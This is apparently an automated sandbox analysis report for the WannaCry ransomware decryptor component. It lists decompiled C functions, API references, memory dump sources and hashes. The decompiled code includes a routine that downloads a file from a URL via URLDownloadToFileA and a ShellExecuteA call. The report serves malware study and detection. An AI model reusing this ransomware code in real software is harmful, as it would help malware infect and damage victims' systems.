                                                      0x00412804
                                                      0x00412807
                                                      0x0041280b
                                                      0x0041280f
                                                      0x00412813
                                                      0x0041287d
                                                      0x00412815
                                                      0x00412816
                                                      0x0041281c
                                                      0x0041281e
                                                      0x00412825
                                                      0x0041282f
                                                      0x00412835
                                                      0x0041283b
                                                      0x00412844
                                                      0x00412846
                                                      0x00412848
                                                      0x00412849
                                                      0x0041285a
                                                      0x00412860
                                                      0x00412862
                                                      0x00412868
                                                      0x0041286c
                                                      0x00412876
                                                      0x00412876
                                                      0x00412878
                                                      0x00412878
                                                      0x0041287a
                                                      0x0041288b
                                                      0x0041288c
                                                      0x0041288d
                                                      0x00412890
                                                      0x00412898
                                                      0x0041289f
                                                      0x004128a4
                                                      0x004128f8
                                                      0x004128fa
                                                      0x00412906
                                                      0x0041290c
                                                      0x00412911
                                                      0x0041291b
                                                      0x004128a6
                                                      0x004128a8
                                                      0x004128aa
                                                      0x004128b2
                                                      0x004128b4
                                                      0x004128b5
                                                      0x004128ba
                                                      0x004128ba
                                                      0x004128bd
                                                      0x004128c3
                                                      0x004128cb
                                                      0x004128cd
                                                      0x004128ce
                                                      0x004128d3
                                                      0x004128d3
                                                      0x004128d6
                                                      0x004128d7
                                                      0x004128dd
                                                      0x004128e2
                                                      0x004128e2
                                                      0x004128ed
                                                      0x004128f7
                                                      0x004128f7

                                                      APIs
                                                      • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                                      • #823.MFC42(?,?,?), ref: 00412849
                                                      • #825.MFC42(?), ref: 004128B5
                                                      • #825.MFC42(?), ref: 004128CE
                                                      • #825.MFC42(00000000), ref: 004128DD
                                                      • #823.MFC42(00000008), ref: 004128FA
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825
                                                      • String ID:
                                                      • API String ID: 89657779-0
                                                      • Opcode ID: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
                                                      • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                                      • Opcode Fuzzy Hash: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
                                                      • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B780 Relevance: 9.1, APIs: 6, Instructions: 68filenetworkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
				intOrPtr _v12;
				void _v259;
				char _v260;
				char _v264;
				char _v284;
				char _t15;
				int _t19;
				CHAR* _t25;
				signed int _t26;
				char* _t40;

				_t26 = __ecx;
				_t25 = _a4;
				CreateDirectoryA(_t25, 0);
				_t40 = _a8;
				asm("repne scasb");
				if( !(_t26 | 0xffffffff) == 1) {
					L4:
					return 0;
				} else {
					_t15 =  *0x421798; // 0x0
					_v260 = _t15;
					memset( &_v259, 0, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetTempFileNameA(_t25, "t", 0,  &_v260);
					_t19 = DeleteUrlCacheEntry(_t40);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(_t40);
					_push(0);
					L004133CE();
					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
						DeleteFileA( &_v284);
						goto L4;
					} else {
						DeleteFileA( &_v284);
						return 1;
					}
				}
			}













                                                      0x0040b780
                                                      0x0040b787
                                                      0x0040b793
                                                      0x0040b799
                                                      0x0040b7a7
                                                      0x0040b7ac
                                                      0x0040b81d
                                                      0x0040b826
                                                      0x0040b7ae
                                                      0x0040b7ae
                                                      0x0040b7b8
                                                      0x0040b7c2
                                                      0x0040b7c8
                                                      0x0040b7d3
                                                      0x0040b7d4
                                                      0x0040b7db
                                                      0x0040b7e1
                                                      0x0040b7e7
                                                      0x0040b7e9
                                                      0x0040b7ea
                                                      0x0040b7eb
                                                      0x0040b7ed
                                                      0x0040b7f4
                                                      0x0040b815
                                                      0x00000000
                                                      0x0040b827
                                                      0x0040b82c
                                                      0x0040b83d
                                                      0x0040b83d
                                                      0x0040b7f4

                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000428), ref: 0040B793
                                                      • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                      • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                                      • String ID:
                                                      • API String ID: 361195595-0
                                                      • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                                      • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409A40 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00409A40(signed int* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr* _v24;
				struct tagRECT _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v88;
				intOrPtr _t34;
				void* _t35;
				void* _t53;
				intOrPtr _t56;

				 *[fs:0x0] = _t56;
				_v40.right = 0;
				_v40.top = 0x41679c;
				_v4 = 0;
				E00409D40( &(_v40.bottom), _a4, _a8);
				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
				L00412D5E();
				L00413010();
				_t34 =  *_v24;
				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
				L00412D52();
				_v88 = 0x415c00;
				_v56 = 1;
				L00412D52();
				 *[fs:0x0] = _v64;
				return _t35;
			}














                                                      0x00409a4e
                                                      0x00409a5d
                                                      0x00409a65
                                                      0x00409a73
                                                      0x00409a82
                                                      0x00409a9b
                                                      0x00409ac0
                                                      0x00409acc
                                                      0x00409ad7
                                                      0x00409ae4
                                                      0x00409aeb
                                                      0x00409af0
                                                      0x00409afc
                                                      0x00409b04
                                                      0x00409b0e
                                                      0x00409b18

                                                      APIs
                                                      • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                                      • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                                      • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                                      • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414Rect$#1641#5781CreateOffset
                                                      • String ID:
                                                      • API String ID: 2675356817-0
                                                      • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                                      • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004034A0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E004034A0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413620);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0xe8)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x004034a0
                                                      0x004034a2
                                                      0x004034ad
                                                      0x004034ae
                                                      0x004034ba
                                                      0x004034c6
                                                      0x004034d6
                                                      0x004034d7
                                                      0x004034e0
                                                      0x004034e4
                                                      0x004034e7
                                                      0x004034ef
                                                      0x00403519
                                                      0x0040351f
                                                      0x00403524
                                                      0x00403529
                                                      0x00403535
                                                      0x0040353d
                                                      0x0040354b
                                                      0x00403555

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                                      • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406940 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00406940(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413E30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x824)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x00406940
                                                      0x00406942
                                                      0x0040694d
                                                      0x0040694e
                                                      0x0040695a
                                                      0x00406966
                                                      0x00406976
                                                      0x00406977
                                                      0x00406980
                                                      0x00406984
                                                      0x00406987
                                                      0x0040698f
                                                      0x004069b9
                                                      0x004069bf
                                                      0x004069c4
                                                      0x004069c9
                                                      0x004069d5
                                                      0x004069dd
                                                      0x004069eb
                                                      0x004069f5

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                                      • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404EB0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00404EB0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413870);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x6c)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                                      0x00404eb0
                                                      0x00404eb2
                                                      0x00404ebd
                                                      0x00404ebe
                                                      0x00404eca
                                                      0x00404ed6
                                                      0x00404ee3
                                                      0x00404ee4
                                                      0x00404eed
                                                      0x00404ef1
                                                      0x00404ef4
                                                      0x00404efc
                                                      0x00404f26
                                                      0x00404f2c
                                                      0x00404f31
                                                      0x00404f36
                                                      0x00404f42
                                                      0x00404f4a
                                                      0x00404f58
                                                      0x00404f62

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                                      • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404310 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E00404310(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v132;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;

				_push(0xffffffff);
				_push(E004137A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_t39 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					E004044C0(__ecx, 0);
				}
				L00412DD0();
				_t20 = _t39 + 0x48;
				_v8 = 0;
				L00412DCA();
				L00412DC4();
				L00412DBE();
				_t40 =  *((intOrPtr*)(_t39 + 0x40));
				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
				_push(_t20);
				L00412DCA();
				_v40 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v48;
				return _t22;
			}


















                                                      0x00404316
                                                      0x00404318
                                                      0x0040431d
                                                      0x0040431e
                                                      0x00404329
                                                      0x00404331
                                                      0x00404335
                                                      0x00404335
                                                      0x0040433f
                                                      0x00404344
                                                      0x0040434c
                                                      0x00404354
                                                      0x00404361
                                                      0x0040436e
                                                      0x00404373
                                                      0x00404387
                                                      0x0040438a
                                                      0x0040438f
                                                      0x00404398
                                                      0x004043a0
                                                      0x004043ab
                                                      0x004043b5

                                                      APIs
                                                      • #470.MFC42(?,00000000), ref: 0040433F
                                                      • #5789.MFC42 ref: 00404354
                                                      • #5875.MFC42(00000001), ref: 00404361
                                                      • #6172.MFC42(?,00000001), ref: 0040436E
                                                      • #5789.MFC42(00000000), ref: 0040438F
                                                      • #755.MFC42(00000000), ref: 004043A0
                                                        • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                                        • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                                        • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                        • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                                        • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                        • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                                        • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 3301245081-0
                                                      • Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                                      • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                                      • Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                                      • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403EB0 Relevance: 9.0, APIs: 6, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				_push(_t9);
				_push(0x407);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(0x408);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(2);
				L00412CE6();
				L00412D88();
				return __eax;
			}




                                                      0x00403eb2
                                                      0x00403eb8
                                                      0x00403eb9
                                                      0x00403ebe
                                                      0x00403ec5
                                                      0x00403eca
                                                      0x00403ecb
                                                      0x00403ed2
                                                      0x00403ed9
                                                      0x00403ede
                                                      0x00403edf
                                                      0x00403ee3
                                                      0x00403eea
                                                      0x00403ef1

                                                      APIs
                                                      • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                      • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                      • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                      • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                      • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                      • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092
                                                      • String ID:
                                                      • API String ID: 2547810013-0
                                                      • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                                      • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E00406EF0(void* __ecx, char* _a4, void** _a8) {
				char* _v4;
				char _v8;
				void* _v12;
				char* _t14;
				char _t15;
				char* _t17;
				struct HWND__* _t18;
				char _t23;

				_t14 = _a4;
				if(_t14[0xc] != 0x201) {
					L5:
					 *_a8 = 0;
					return _t14;
				}
				_t23 = _t14[0x18];
				_t15 = _t14[0x1c];
				_v8 = _t15;
				_t17 = _t15 - _t23 + 1;
				_v12 = _t23;
				_push(_t17);
				L00412CEC();
				_v4 = _t17;
				if(_t17 != 0) {
					_t18 = __ecx + 0x4c0;
					if(_t18 != 0) {
						_t18 =  *(_t18 + 0x20);
					}
					SendMessageA(_t18, 0x44b, 0,  &_v12);
					ShellExecuteA(0, "open", _v4, 0, 0, 5);
					_t14 = _v4;
					_push(_t14);
					L00412C98();
					goto L5;
				}
				return _t17;
			}











                                                      0x00406ef0
                                                      0x00406f01
                                                      0x00406f6a
                                                      0x00406f6e
                                                      0x00000000
                                                      0x00406f6e
                                                      0x00406f03
                                                      0x00406f06
                                                      0x00406f09
                                                      0x00406f0f
                                                      0x00406f10
                                                      0x00406f14
                                                      0x00406f15
                                                      0x00406f1d
                                                      0x00406f23
                                                      0x00406f25
                                                      0x00406f2d
                                                      0x00406f2f
                                                      0x00406f2f
                                                      0x00406f3f
                                                      0x00406f57
                                                      0x00406f5d
                                                      0x00406f61
                                                      0x00406f62
                                                      0x00000000
                                                      0x00406f67
                                                      0x00406f78

                                                      APIs
                                                      • #823.MFC42(?), ref: 00406F15
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                                      • #825.MFC42(?), ref: 00406F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
